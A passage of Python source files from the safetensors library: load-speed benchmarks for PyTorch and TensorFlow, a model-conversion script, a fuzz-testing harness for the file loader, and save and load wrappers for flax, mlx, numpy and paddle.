768)) 13 | tensors["wpe"] = torch.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768)) 22 | tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768)) 23 | tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768)) 28 | tensors["ln_f.weight"] = torch.zeros((768)) 29 | tensors["ln_f.bias"] = torch.zeros((768)) 30 | return tensors 31 | 32 | 33 | def create_lora(n_layers: int): 34 | tensors = {} 35 | for i in range(n_layers): 36 | tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32)) 37 | tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32)) 38 | return tensors 39 | 40 | 41 | def test_pt_pt_load_cpu(benchmark): 42 | # benchmark something 43 | weights = create_gpt2(12) 44 | with tempfile.NamedTemporaryFile(delete=False) as f: 45 | torch.save(weights, f) 46 | result = benchmark(torch.load, f.name) 47 | os.unlink(f.name) 48 | 49 | for k, v in weights.items(): 50 | tv = result[k] 51 | assert torch.allclose(v, tv) 52 | 53 | 54 | def test_pt_sf_load_cpu(benchmark): 55 | # benchmark something 56 | weights = create_gpt2(12) 57 | with tempfile.NamedTemporaryFile(delete=False) as f: 58 | save_file(weights, f.name) 59 | result = benchmark(load_file, f.name) 60 | os.unlink(f.name) 61 | 62 | for k, v in weights.items(): 63 | tv = result[k] 64 | assert torch.allclose(v, tv) 65 | 66 | 67 | def test_pt_pt_load_cpu_small(benchmark): 68 | weights = create_lora(500) 69 | with tempfile.NamedTemporaryFile(delete=False) as f: 70 | torch.save(weights, f) 71 | result = benchmark(torch.load, f.name) 72 | os.unlink(f.name) 73 | 74 | for k, v in weights.items(): 75 | tv = result[k] 76 | assert torch.allclose(v, tv) 77 | 78 | 79 | def test_pt_sf_load_cpu_small(benchmark): 80 | weights = create_lora(500) 81 | with tempfile.NamedTemporaryFile(delete=False) as f: 82 | save_file(weights, f.name) 83 | result = benchmark(load_file, f.name) 84 | os.unlink(f.name) 85 | 86 | for k, v in weights.items(): 87 | tv = result[k] 88 | assert torch.allclose(v, tv) 89 | 90 | 91 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") 92 | def test_pt_pt_load_gpu(benchmark): 93 | # benchmark something 94 | weights = create_gpt2(12) 95 | with tempfile.NamedTemporaryFile(delete=False) as f: 96 | torch.save(weights, f) 97 | result = benchmark(torch.load, f.name, map_location="cuda:0") 98 | os.unlink(f.name) 99 | 100 | for k, v in weights.items(): 101 | v = v.cuda() 102 | tv = result[k] 103 | assert torch.allclose(v, tv) 104 | 105 | 106 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") 107 | def test_pt_sf_load_gpu(benchmark): 108 | # benchmark something 109 | weights = create_gpt2(12) 110 | with tempfile.NamedTemporaryFile(delete=False) as f: 111 | save_file(weights, f.name) 112 | result = benchmark(load_file, f.name, device="cuda:0") 113 | os.unlink(f.name) 114 | 115 | for k, v in weights.items(): 116 | v = v.cuda() 117 | tv = result[k] 118 | assert torch.allclose(v, tv) 119 | 120 | 121 | @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps") 122 | def test_pt_pt_load_mps(benchmark): 123 | # benchmark something 124 | weights = create_gpt2(12) 125 | with tempfile.NamedTemporaryFile(delete=False) as f: 126 | torch.save(weights, f) 127 | result = benchmark(torch.load, f.name, map_location="mps") 128 | os.unlink(f.name) 129 | 130 | for k, v in weights.items(): 131 | v = v.to(device="mps") 132 | tv = result[k] 133 | assert torch.allclose(v, tv) 134 | 135 | 136 | @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps") 137 | def test_pt_sf_load_mps(benchmark): 138 | # benchmark something 139 | weights = create_gpt2(12) 140 | with tempfile.NamedTemporaryFile(delete=False) as f: 141 | save_file(weights, f.name) 142 | result = benchmark(load_file, f.name, device="mps") 143 | os.unlink(f.name) 144 | 145 | for k, v in weights.items(): 146 | v = v.to(device="mps") 147 | tv = result[k] 148 | assert torch.allclose(v, tv) 149 | -------------------------------------------------------------------------------- /bindings/python/benches/test_tf.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import h5py 5 | import numpy as np 6 | import tensorflow as tf 7 | 8 | from safetensors.tensorflow import load_file, save_file 9 | 10 | 11 | def _load(filename, tensors=None, prefix=""): 12 | with h5py.File(filename, "r") as f: 13 | if tensors is None: 14 | tensors = {} 15 | for k in f.keys(): 16 | if isinstance(f[k], h5py._hl.dataset.Dataset): 17 | key = k if not prefix else f"{prefix}_{k}" 18 | tensors[key] = tf.convert_to_tensor(np.array(f[k])) 19 | else: 20 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) 21 | return tensors 22 | 23 | 24 | def _save(filename, tensors, prefix=""): 25 | with h5py.File(filename, "w") as f: 26 | for name, tensor in tensors.items(): 27 | tensor = tensor.numpy() 28 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) 29 | dset[:] = tensor 30 | 31 | 32 | def create_gpt2(n_layers: int): 33 | tensors = {} 34 | tensors["wte"] = tf.zeros((50257, 768)) 35 | tensors["wpe"] = tf.zeros((1024, 768)) 36 | for i in range(n_layers): 37 | tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,)) 38 | tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,)) 39 | tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024)) 40 | tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304)) 41 | tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304)) 42 | tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768)) 43 | tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768)) 44 | tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768)) 45 | tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768)) 46 | tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072)) 47 | tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072)) 48 | tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768)) 49 | tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768)) 50 | tensors["ln_f.weight"] = tf.zeros((768)) 51 | tensors["ln_f.bias"] = tf.zeros((768)) 52 | return tensors 53 | 54 | 55 | def test_tf_tf_load(benchmark): 56 | # benchmark something 57 | weights = create_gpt2(12) 58 | with tempfile.NamedTemporaryFile(delete=False) as f: 59 | _save(f.name, weights) 60 | result = benchmark(_load, f.name) 61 | os.unlink(f.name) 62 | 63 | for k, v in weights.items(): 64 | tv = result[k] 65 | assert np.allclose(v, tv) 66 | 67 | 68 | def test_tf_sf_load(benchmark): 69 | # benchmark something 70 | weights = create_gpt2(12) 71 | with tempfile.NamedTemporaryFile(delete=False) as f: 72 | save_file(weights, f.name) 73 | result = benchmark(load_file, f.name) 74 | os.unlink(f.name) 75 | 76 | for k, v in weights.items(): 77 | tv = result[k] 78 | assert np.allclose(v, tv) 79 | -------------------------------------------------------------------------------- /bindings/python/convert_all.py: -------------------------------------------------------------------------------- 1 | """Simple utility tool to convert automatically most downloaded models""" 2 | from convert import AlreadyExists, convert 3 | from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments 4 | from transformers import AutoConfig 5 | 6 | 7 | if __name__ == "__main__": 8 | api = HfApi() 9 | args = ModelSearchArguments() 10 | 11 | total = 50 12 | models = list( 13 | api.list_models(filter=ModelFilter(library=args.library.Transformers), sort="downloads", direction=-1) 14 | )[:total] 15 | 16 | correct = 0 17 | errors = set() 18 | for model in models: 19 | model = api.model_info(model.id, files_metadata=True) 20 | size = None 21 | for sibling in model.siblings: 22 | if sibling.rfilename == "pytorch_model.bin": 23 | size = sibling.size 24 | if size is None or size > 2_000_000_000: 25 | print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})") 26 | continue 27 | 28 | model_id = model.modelId 29 | print(f"[{model.downloads}] {model.modelId}") 30 | try: 31 | convert(api, model_id) 32 | correct += 1 33 | except AlreadyExists as e: 34 | correct += 1 35 | print(e) 36 | except Exception as e: 37 | config = AutoConfig.from_pretrained(model_id) 38 | errors.add(config.__class__.__name__) 39 | print(e) 40 | 41 | print(f"Errors: {errors}") 42 | print(f"File size is difference {len(errors)}") 43 | print(f"Correct rate {correct}/{total} ({correct/total * 100:.2f}%)") 44 | -------------------------------------------------------------------------------- /bindings/python/fuzz.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import sys 3 | import tempfile 4 | from collections import defaultdict 5 | 6 | import atheris 7 | 8 | 9 | with atheris.instrument_imports(): 10 | from safetensors.torch import load_file 11 | 12 | 13 | EXCEPTIONS = defaultdict(int) 14 | START = datetime.datetime.now() 15 | DT = datetime.timedelta(seconds=30) 16 | 17 | 18 | def TestOneInput(data): 19 | global START 20 | with tempfile.NamedTemporaryFile() as f: 21 | f.write(data) 22 | f.seek(0) 23 | try: 24 | load_file(f.name, device=0) 25 | except Exception as e: 26 | EXCEPTIONS[str(e)] += 1 27 | 28 | if datetime.datetime.now() - START > DT: 29 | for e, n in EXCEPTIONS.items(): 30 | print(e, n) 31 | START = datetime.datetime.now() 32 | 33 | 34 | atheris.Setup(sys.argv, TestOneInput) 35 | atheris.Fuzz() 36 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/__init__.py: -------------------------------------------------------------------------------- 1 | # Re-export this 2 | from ._safetensors_rust import ( # noqa: F401 3 | SafetensorError, 4 | __version__, 5 | deserialize, 6 | safe_open, 7 | serialize, 8 | serialize_file, 9 | ) 10 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/__init__.pyi: -------------------------------------------------------------------------------- 1 | # Generated content DO NOT EDIT 2 | @staticmethod 3 | def deserialize(bytes): 4 | """ 5 | Opens a safetensors lazily and returns tensors as asked 6 | 7 | Args: 8 | data (`bytes`): 9 | The byte content of a file 10 | 11 | Returns: 12 | (`List[str, Dict[str, Dict[str, any]]]`): 13 | The deserialized content is like: 14 | [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)] 15 | """ 16 | pass 17 | 18 | @staticmethod 19 | def serialize(tensor_dict, metadata=None): 20 | """ 21 | Serializes raw data. 22 | 23 | Args: 24 | tensor_dict (`Dict[str, Dict[Any]]`): 25 | The tensor dict is like: 26 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} 27 | metadata (`Dict[str, str]`, *optional*): 28 | The optional purely text annotations 29 | 30 | Returns: 31 | (`bytes`): 32 | The serialized content. 33 | """ 34 | pass 35 | 36 | @staticmethod 37 | def serialize_file(tensor_dict, filename, metadata=None): 38 | """ 39 | Serializes raw data into file. 40 | 41 | Args: 42 | tensor_dict (`Dict[str, Dict[Any]]`): 43 | The tensor dict is like: 44 | {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} 45 | filename (`str`, or `os.PathLike`): 46 | The name of the file to write into. 47 | metadata (`Dict[str, str]`, *optional*): 48 | The optional purely text annotations 49 | 50 | Returns: 51 | (`NoneType`): 52 | On success return None. 53 | """ 54 | pass 55 | 56 | class safe_open: 57 | """ 58 | Opens a safetensors lazily and returns tensors as asked 59 | 60 | Args: 61 | filename (`str`, or `os.PathLike`): 62 | The filename to open 63 | 64 | framework (`str`): 65 | The framework you want you tensors in. Supported values: 66 | `pt`, `tf`, `flax`, `numpy`. 67 | 68 | device (`str`, defaults to `"cpu"`): 69 | The device on which you want the tensors. 70 | """ 71 | 72 | def __init__(self, filename, framework, device=...): 73 | pass 74 | def __enter__(self): 75 | """ 76 | Start the context manager 77 | """ 78 | pass 79 | def __exit__(self, _exc_type, _exc_value, _traceback): 80 | """ 81 | Exits the context manager 82 | """ 83 | pass 84 | def get_slice(self, name): 85 | """ 86 | Returns a full slice view object 87 | 88 | Args: 89 | name (`str`): 90 | The name of the tensor you want 91 | 92 | Returns: 93 | (`PySafeSlice`): 94 | A dummy object you can slice into to get a real tensor 95 | Example: 96 | ```python 97 | from safetensors import safe_open 98 | 99 | with safe_open("model.safetensors", framework="pt", device=0) as f: 100 | tensor_part = f.get_slice("embedding")[:, ::8] 101 | 102 | ``` 103 | """ 104 | pass 105 | def get_tensor(self, name): 106 | """ 107 | Returns a full tensor 108 | 109 | Args: 110 | name (`str`): 111 | The name of the tensor you want 112 | 113 | Returns: 114 | (`Tensor`): 115 | The tensor in the framework you opened the file for. 116 | 117 | Example: 118 | ```python 119 | from safetensors import safe_open 120 | 121 | with safe_open("model.safetensors", framework="pt", device=0) as f: 122 | tensor = f.get_tensor("embedding") 123 | 124 | ``` 125 | """ 126 | pass 127 | def keys(self): 128 | """ 129 | Returns the names of the tensors in the file. 130 | 131 | Returns: 132 | (`List[str]`): 133 | The name of the tensors contained in that file 134 | """ 135 | pass 136 | def metadata(self): 137 | """ 138 | Return the special non tensor information in the header 139 | 140 | Returns: 141 | (`Dict[str, str]`): 142 | The freeform metadata. 143 | """ 144 | pass 145 | 146 | class SafetensorError(Exception): 147 | """ 148 | Custom Python Exception for Safetensor errors. 149 | """ 150 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/flax.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | 6 | import jax.numpy as jnp 7 | from jax import Array 8 | from safetensors import numpy, safe_open 9 | 10 | 11 | def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes: 12 | """ 13 | Saves a dictionary of tensors into raw bytes in safetensors format. 14 | 15 | Args: 16 | tensors (`Dict[str, Array]`): 17 | The incoming tensors. Tensors need to be contiguous and dense. 18 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 19 | Optional text only metadata you might want to save in your header. 20 | For instance it can be useful to specify more about the underlying 21 | tensors. This is purely informative and does not affect tensor loading. 22 | 23 | Returns: 24 | `bytes`: The raw bytes representing the format 25 | 26 | Example: 27 | 28 | ```python 29 | from safetensors.flax import save 30 | from jax import numpy as jnp 31 | 32 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} 33 | byte_data = save(tensors) 34 | ``` 35 | """ 36 | np_tensors = _jnp2np(tensors) 37 | return numpy.save(np_tensors, metadata=metadata) 38 | 39 | 40 | def save_file( 41 | tensors: Dict[str, Array], 42 | filename: Union[str, os.PathLike], 43 | metadata: Optional[Dict[str, str]] = None, 44 | ) -> None: 45 | """ 46 | Saves a dictionary of tensors into raw bytes in safetensors format. 47 | 48 | Args: 49 | tensors (`Dict[str, Array]`): 50 | The incoming tensors. Tensors need to be contiguous and dense. 51 | filename (`str`, or `os.PathLike`)): 52 | The filename we're saving into. 53 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 54 | Optional text only metadata you might want to save in your header. 55 | For instance it can be useful to specify more about the underlying 56 | tensors. This is purely informative and does not affect tensor loading. 57 | 58 | Returns: 59 | `None` 60 | 61 | Example: 62 | 63 | ```python 64 | from safetensors.flax import save_file 65 | from jax import numpy as jnp 66 | 67 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} 68 | save_file(tensors, "model.safetensors") 69 | ``` 70 | """ 71 | np_tensors = _jnp2np(tensors) 72 | return numpy.save_file(np_tensors, filename, metadata=metadata) 73 | 74 | 75 | def load(data: bytes) -> Dict[str, Array]: 76 | """ 77 | Loads a safetensors file into flax format from pure bytes. 78 | 79 | Args: 80 | data (`bytes`): 81 | The content of a safetensors file 82 | 83 | Returns: 84 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu 85 | 86 | Example: 87 | 88 | ```python 89 | from safetensors.flax import load 90 | 91 | file_path = "./my_folder/bert.safetensors" 92 | with open(file_path, "rb") as f: 93 | data = f.read() 94 | 95 | loaded = load(data) 96 | ``` 97 | """ 98 | flat = numpy.load(data) 99 | return _np2jnp(flat) 100 | 101 | 102 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]: 103 | """ 104 | Loads a safetensors file into flax format. 105 | 106 | Args: 107 | filename (`str`, or `os.PathLike`)): 108 | The name of the file which contains the tensors 109 | 110 | Returns: 111 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` 112 | 113 | Example: 114 | 115 | ```python 116 | from safetensors.flax import load_file 117 | 118 | file_path = "./my_folder/bert.safetensors" 119 | loaded = load_file(file_path) 120 | ``` 121 | """ 122 | result = {} 123 | with safe_open(filename, framework="flax") as f: 124 | for k in f.offset_keys(): 125 | result[k] = f.get_tensor(k) 126 | return result 127 | 128 | 129 | def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]: 130 | for k, v in numpy_dict.items(): 131 | numpy_dict[k] = jnp.array(v) 132 | return numpy_dict 133 | 134 | 135 | def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]: 136 | for k, v in jnp_dict.items(): 137 | jnp_dict[k] = np.asarray(v) 138 | return jnp_dict 139 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/mlx.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | 6 | import mlx.core as mx 7 | from safetensors import numpy, safe_open 8 | 9 | 10 | def save(tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None) -> bytes: 11 | """ 12 | Saves a dictionary of tensors into raw bytes in safetensors format. 13 | 14 | Args: 15 | tensors (`Dict[str, mx.array]`): 16 | The incoming tensors. Tensors need to be contiguous and dense. 17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 18 | Optional text only metadata you might want to save in your header. 19 | For instance it can be useful to specify more about the underlying 20 | tensors. This is purely informative and does not affect tensor loading. 21 | 22 | Returns: 23 | `bytes`: The raw bytes representing the format 24 | 25 | Example: 26 | 27 | ```python 28 | from safetensors.mlx import save 29 | import mlx.core as mx 30 | 31 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} 32 | byte_data = save(tensors) 33 | ``` 34 | """ 35 | np_tensors = _mx2np(tensors) 36 | return numpy.save(np_tensors, metadata=metadata) 37 | 38 | 39 | def save_file( 40 | tensors: Dict[str, mx.array], 41 | filename: Union[str, os.PathLike], 42 | metadata: Optional[Dict[str, str]] = None, 43 | ) -> None: 44 | """ 45 | Saves a dictionary of tensors into raw bytes in safetensors format. 46 | 47 | Args: 48 | tensors (`Dict[str, mx.array]`): 49 | The incoming tensors. Tensors need to be contiguous and dense. 50 | filename (`str`, or `os.PathLike`)): 51 | The filename we're saving into. 52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 53 | Optional text only metadata you might want to save in your header. 54 | For instance it can be useful to specify more about the underlying 55 | tensors. This is purely informative and does not affect tensor loading. 56 | 57 | Returns: 58 | `None` 59 | 60 | Example: 61 | 62 | ```python 63 | from safetensors.mlx import save_file 64 | import mlx.core as mx 65 | 66 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} 67 | save_file(tensors, "model.safetensors") 68 | ``` 69 | """ 70 | np_tensors = _mx2np(tensors) 71 | return numpy.save_file(np_tensors, filename, metadata=metadata) 72 | 73 | 74 | def load(data: bytes) -> Dict[str, mx.array]: 75 | """ 76 | Loads a safetensors file into MLX format from pure bytes. 77 | 78 | Args: 79 | data (`bytes`): 80 | The content of a safetensors file 81 | 82 | Returns: 83 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` 84 | 85 | Example: 86 | 87 | ```python 88 | from safetensors.mlx import load 89 | 90 | file_path = "./my_folder/bert.safetensors" 91 | with open(file_path, "rb") as f: 92 | data = f.read() 93 | 94 | loaded = load(data) 95 | ``` 96 | """ 97 | flat = numpy.load(data) 98 | return _np2mx(flat) 99 | 100 | 101 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]: 102 | """ 103 | Loads a safetensors file into MLX format. 104 | 105 | Args: 106 | filename (`str`, or `os.PathLike`)): 107 | The name of the file which contains the tensors 108 | 109 | Returns: 110 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array` 111 | 112 | Example: 113 | 114 | ```python 115 | from safetensors.flax import load_file 116 | 117 | file_path = "./my_folder/bert.safetensors" 118 | loaded = load_file(file_path) 119 | ``` 120 | """ 121 | result = {} 122 | with safe_open(filename, framework="mlx") as f: 123 | for k in f.offset_keys(): 124 | result[k] = f.get_tensor(k) 125 | return result 126 | 127 | 128 | def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]: 129 | for k, v in numpy_dict.items(): 130 | numpy_dict[k] = mx.array(v) 131 | return numpy_dict 132 | 133 | 134 | def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]: 135 | new_dict = {} 136 | for k, v in mx_dict.items(): 137 | new_dict[k] = np.asarray(v) 138 | return new_dict 139 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/numpy.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | from typing import Dict, Optional, Union 4 | 5 | import numpy as np 6 | 7 | from safetensors import deserialize, safe_open, serialize, serialize_file 8 | 9 | 10 | def _tobytes(tensor: np.ndarray) -> bytes: 11 | if not _is_little_endian(tensor): 12 | tensor = tensor.byteswap(inplace=False) 13 | return tensor.tobytes() 14 | 15 | 16 | def save(tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None) -> bytes: 17 | """ 18 | Saves a dictionary of tensors into raw bytes in safetensors format. 19 | 20 | Args: 21 | tensor_dict (`Dict[str, np.ndarray]`): 22 | The incoming tensors. Tensors need to be contiguous and dense. 23 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 24 | Optional text only metadata you might want to save in your header. 25 | For instance it can be useful to specify more about the underlying 26 | tensors. This is purely informative and does not affect tensor loading. 27 | 28 | Returns: 29 | `bytes`: The raw bytes representing the format 30 | 31 | Example: 32 | 33 | ```python 34 | from safetensors.numpy import save 35 | import numpy as np 36 | 37 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} 38 | byte_data = save(tensors) 39 | ``` 40 | """ 41 | flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()} 42 | serialized = serialize(flattened, metadata=metadata) 43 | result = bytes(serialized) 44 | return result 45 | 46 | 47 | def save_file( 48 | tensor_dict: Dict[str, np.ndarray], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None 49 | ) -> None: 50 | """ 51 | Saves a dictionary of tensors into raw bytes in safetensors format. 52 | 53 | Args: 54 | tensor_dict (`Dict[str, np.ndarray]`): 55 | The incoming tensors. Tensors need to be contiguous and dense. 56 | filename (`str`, or `os.PathLike`)): 57 | The filename we're saving into. 58 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 59 | Optional text only metadata you might want to save in your header. 60 | For instance it can be useful to specify more about the underlying 61 | tensors. This is purely informative and does not affect tensor loading. 62 | 63 | Returns: 64 | `None` 65 | 66 | Example: 67 | 68 | ```python 69 | from safetensors.numpy import save_file 70 | import numpy as np 71 | 72 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} 73 | save_file(tensors, "model.safetensors") 74 | ``` 75 | """ 76 | flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()} 77 | serialize_file(flattened, filename, metadata=metadata) 78 | 79 | 80 | def load(data: bytes) -> Dict[str, np.ndarray]: 81 | """ 82 | Loads a safetensors file into numpy format from pure bytes. 83 | 84 | Args: 85 | data (`bytes`): 86 | The content of a safetensors file 87 | 88 | Returns: 89 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` on cpu 90 | 91 | Example: 92 | 93 | ```python 94 | from safetensors.numpy import load 95 | 96 | file_path = "./my_folder/bert.safetensors" 97 | with open(file_path, "rb") as f: 98 | data = f.read() 99 | 100 | loaded = load(data) 101 | ``` 102 | """ 103 | flat = deserialize(data) 104 | return _view2np(flat) 105 | 106 | 107 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]: 108 | """ 109 | Loads a safetensors file into numpy format. 110 | 111 | Args: 112 | filename (`str`, or `os.PathLike`)): 113 | The name of the file which contains the tensors 114 | 115 | Returns: 116 | `Dict[str, np.ndarray]`: dictionary that contains name as key, value as `np.ndarray` 117 | 118 | Example: 119 | 120 | ```python 121 | from safetensors.numpy import load_file 122 | 123 | file_path = "./my_folder/bert.safetensors" 124 | loaded = load_file(file_path) 125 | ``` 126 | """ 127 | result = {} 128 | with safe_open(filename, framework="np") as f: 129 | for k in f.offset_keys(): 130 | result[k] = f.get_tensor(k) 131 | return result 132 | 133 | 134 | _TYPES = { 135 | "F64": np.float64, 136 | "F32": np.float32, 137 | "F16": np.float16, 138 | "I64": np.int64, 139 | "U64": np.uint64, 140 | "I32": np.int32, 141 | "U32": np.uint32, 142 | "I16": np.int16, 143 | "U16": np.uint16, 144 | "I8": np.int8, 145 | "U8": np.uint8, 146 | "BOOL": bool, 147 | } 148 | 149 | 150 | def _getdtype(dtype_str: str) -> np.dtype: 151 | return _TYPES[dtype_str] 152 | 153 | 154 | def _view2np(safeview) -> Dict[str, np.ndarray]: 155 | result = {} 156 | for k, v in safeview: 157 | dtype = _getdtype(v["dtype"]) 158 | arr = np.frombuffer(v["data"], dtype=dtype).reshape(v["shape"]) 159 | result[k] = arr 160 | return result 161 | 162 | 163 | def _is_little_endian(tensor: np.ndarray) -> bool: 164 | byteorder = tensor.dtype.byteorder 165 | if byteorder == "=": 166 | if sys.byteorder == "little": 167 | return True 168 | else: 169 | return False 170 | elif byteorder == "|": 171 | return True 172 | elif byteorder == "<": 173 | return True 174 | elif byteorder == ">": 175 | return False 176 | raise ValueError(f"Unexpected byte order {byteorder}") 177 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/paddle.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | 6 | import paddle 7 | from safetensors import numpy 8 | 9 | 10 | def save(tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: 11 | """ 12 | Saves a dictionary of tensors into raw bytes in safetensors format. 13 | 14 | Args: 15 | tensors (`Dict[str, paddle.Tensor]`): 16 | The incoming tensors. Tensors need to be contiguous and dense. 17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 18 | Optional text only metadata you might want to save in your header. 19 | For instance it can be useful to specify more about the underlying 20 | tensors. This is purely informative and does not affect tensor loading. 21 | 22 | Returns: 23 | `bytes`: The raw bytes representing the format 24 | 25 | Example: 26 | 27 | ```python 28 | from safetensors.paddle import save 29 | import paddle 30 | 31 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} 32 | byte_data = save(tensors) 33 | ``` 34 | """ 35 | np_tensors = _paddle2np(tensors) 36 | return numpy.save(np_tensors, metadata=metadata) 37 | 38 | 39 | def save_file( 40 | tensors: Dict[str, paddle.Tensor], 41 | filename: Union[str, os.PathLike], 42 | metadata: Optional[Dict[str, str]] = None, 43 | ) -> None: 44 | """ 45 | Saves a dictionary of tensors into raw bytes in safetensors format. 46 | 47 | Args: 48 | tensors (`Dict[str, paddle.Tensor]`): 49 | The incoming tensors. Tensors need to be contiguous and dense. 50 | filename (`str`, or `os.PathLike`)): 51 | The filename we're saving into. 52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 53 | Optional text only metadata you might want to save in your header. 54 | For instance it can be useful to specify more about the underlying 55 | tensors. This is purely informative and does not affect tensor loading. 56 | 57 | Returns: 58 | `None` 59 | 60 | Example: 61 | 62 | ```python 63 | from safetensors.paddle import save_file 64 | import paddle 65 | 66 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} 67 | save_file(tensors, "model.safetensors") 68 | ``` 69 | """ 70 | np_tensors = _paddle2np(tensors) 71 | return numpy.save_file(np_tensors, filename, metadata=metadata) 72 | 73 | 74 | def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]: 75 | """ 76 | Loads a safetensors file into paddle format from pure bytes. 77 | 78 | Args: 79 | data (`bytes`): 80 | The content of a safetensors file 81 | 82 | Returns: 83 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on cpu 84 | 85 | Example: 86 | 87 | ```python 88 | from safetensors.paddle import load 89 | 90 | file_path = "./my_folder/bert.safetensors" 91 | with open(file_path, "rb") as f: 92 | data = f.read() 93 | 94 | loaded = load(data) 95 | ``` 96 | """ 97 | flat = numpy.load(data) 98 | return _np2paddle(flat, device) 99 | 100 | 101 | def load_file(filename: Union[str, os.PathLike], device="cpu") -> Dict[str, paddle.Tensor]: 102 | """ 103 | Loads a safetensors file into 